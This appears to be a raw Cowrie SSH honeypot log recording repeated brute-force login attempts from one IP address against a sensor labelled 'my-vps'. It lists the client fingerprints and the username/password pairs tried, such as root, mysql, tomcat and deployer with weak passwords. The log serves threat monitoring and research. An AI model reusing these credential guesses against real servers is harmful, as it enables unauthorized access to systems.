{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:42:59.636252Z","src_ip":"212.227.235.229","session":"6170b049964f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:43:00.924954Z","src_ip":"212.227.235.229","session":"6170b049964f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:02.239539Z","src_ip":"212.227.235.229","session":"6170b049964f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50712,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e3d3212b24","protocol":"ssh","message":"New connection: 212.227.235.229:50712 (1.2.3.4:22) [session: f3e3d3212b24]","sensor":"my-vps","timestamp":"2025-09-08T22:43:02.549394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:43:02.550327Z","src_ip":"212.227.235.229","session":"f3e3d3212b24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:43:02.861694Z","src_ip":"212.227.235.229","session":"f3e3d3212b24"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:43:04.145207Z","src_ip":"212.227.235.229","session":"f3e3d3212b24"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:04.457187Z","src_ip":"212.227.235.229","session":"cc7ae5a4dec6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:04.458558Z","src_ip":"212.227.235.229","session":"f3e3d3212b24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52548,"dst_ip":"1.2.3.4","dst_port":22,"session":"efd121305488","protocol":"ssh","message":"New connection: 212.227.235.229:52548 (1.2.3.4:22) [session: efd121305488]","sensor":"my-vps","timestamp":"2025-09-08T22:43:06.011355Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:43:06.038709Z","src_ip":"212.227.235.229","session":"efd121305488"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:43:06.285990Z","src_ip":"212.227.235.229","session":"efd121305488"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:43:07.291924Z","src_ip":"212.227.235.229","session":"efd121305488"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:08.539571Z","src_ip":"212.227.235.229","session":"efd121305488"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:21.504098Z","src_ip":"212.227.125.160","session":"79c88b7fdea5"}
{"eventid":"cowrie.session.closed","duration":180.12619256973267,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:21.509317Z","src_ip":"212.227.125.160","session":"79c88b7fdea5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60210,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a12626a192a","protocol":"ssh","message":"New connection: 212.227.235.229:60210 (1.2.3.4:22) [session: 6a12626a192a]","sensor":"my-vps","timestamp":"2025-09-08T22:43:32.477396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:43:32.478109Z","src_ip":"212.227.235.229","session":"6a12626a192a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:43:32.711984Z","src_ip":"212.227.235.229","session":"6a12626a192a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-09-08T22:43:33.689677Z","src_ip":"212.227.235.229","session":"6a12626a192a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:34.926378Z","src_ip":"212.227.235.229","session":"6a12626a192a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56498,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ae88b02993e","protocol":"ssh","message":"New connection: 212.227.235.229:56498 (1.2.3.4:22) [session: 2ae88b02993e]","sensor":"my-vps","timestamp":"2025-09-08T22:43:42.615214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:43:42.615860Z","src_ip":"212.227.235.229","session":"2ae88b02993e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:43:42.715276Z","src_ip":"212.227.235.229","session":"2ae88b02993e"}
{"eventid":"cowrie.login.failed","username":"neo","password":"neo","message":"login attempt [neo/neo] failed","sensor":"my-vps","timestamp":"2025-09-08T22:43:43.155796Z","src_ip":"212.227.235.229","session":"2ae88b02993e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:43:44.258325Z","src_ip":"212.227.235.229","session":"2ae88b02993e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34084,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b3377d6a11","protocol":"ssh","message":"New connection: 212.227.235.229:34084 (1.2.3.4:22) [session: 43b3377d6a11]","sensor":"my-vps","timestamp":"2025-09-08T22:44:04.652687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:04.653700Z","src_ip":"212.227.235.229","session":"43b3377d6a11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:04.989788Z","src_ip":"212.227.235.229","session":"43b3377d6a11"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:06.375057Z","src_ip":"212.227.235.229","session":"43b3377d6a11"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:07.714585Z","src_ip":"212.227.235.229","session":"43b3377d6a11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36126,"dst_ip":"1.2.3.4","dst_port":22,"session":"e99e5daf8639","protocol":"ssh","message":"New connection: 212.227.235.229:36126 (1.2.3.4:22) [session: e99e5daf8639]","sensor":"my-vps","timestamp":"2025-09-08T22:44:13.615613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:13.616537Z","src_ip":"212.227.235.229","session":"e99e5daf8639"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:13.864121Z","src_ip":"212.227.235.229","session":"e99e5daf8639"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:14.898229Z","src_ip":"212.227.235.229","session":"e99e5daf8639"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:16.148454Z","src_ip":"212.227.235.229","session":"e99e5daf8639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46170,"dst_ip":"1.2.3.4","dst_port":22,"session":"b396931cdb8f","protocol":"ssh","message":"New connection: 212.227.235.229:46170 (1.2.3.4:22) [session: b396931cdb8f]","sensor":"my-vps","timestamp":"2025-09-08T22:44:16.259977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:16.260784Z","src_ip":"212.227.235.229","session":"b396931cdb8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:16.572526Z","src_ip":"212.227.235.229","session":"b396931cdb8f"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password123","message":"login attempt [deployer/password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:17.860814Z","src_ip":"212.227.235.229","session":"b396931cdb8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50060,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab27f1532499","protocol":"ssh","message":"New connection: 212.227.235.229:50060 (1.2.3.4:22) [session: ab27f1532499]","sensor":"my-vps","timestamp":"2025-09-08T22:44:18.760133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:18.780836Z","src_ip":"212.227.235.229","session":"ab27f1532499"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:19.029854Z","src_ip":"212.227.235.229","session":"ab27f1532499"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:19.175645Z","src_ip":"212.227.235.229","session":"b396931cdb8f"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123456789","message":"login attempt [tomcat/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:20.039003Z","src_ip":"212.227.235.229","session":"ab27f1532499"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:21.264143Z","src_ip":"212.227.235.229","session":"ab27f1532499"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43146,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a21daabb029","protocol":"ssh","message":"New connection: 212.227.235.229:43146 (1.2.3.4:22) [session: 4a21daabb029]","sensor":"my-vps","timestamp":"2025-09-08T22:44:44.259383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:44.260173Z","src_ip":"212.227.235.229","session":"4a21daabb029"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:44:44.359097Z","src_ip":"212.227.235.229","session":"4a21daabb029"}
{"eventid":"cowrie.login.failed","username":"black","password":"1","message":"login attempt [black/1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:44:44.798995Z","src_ip":"212.227.235.229","session":"4a21daabb029"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:44:45.900085Z","src_ip":"212.227.235.229","session":"4a21daabb029"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36790,"dst_ip":"1.2.3.4","dst_port":22,"session":"5221cd50c26b","protocol":"ssh","message":"New connection: 212.227.235.229:36790 (1.2.3.4:22) [session: 5221cd50c26b]","sensor":"my-vps","timestamp":"2025-09-08T22:44:46.477942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:44:46.478933Z","src_ip":"212.227.235.229","session":"5221cd50c26b"}
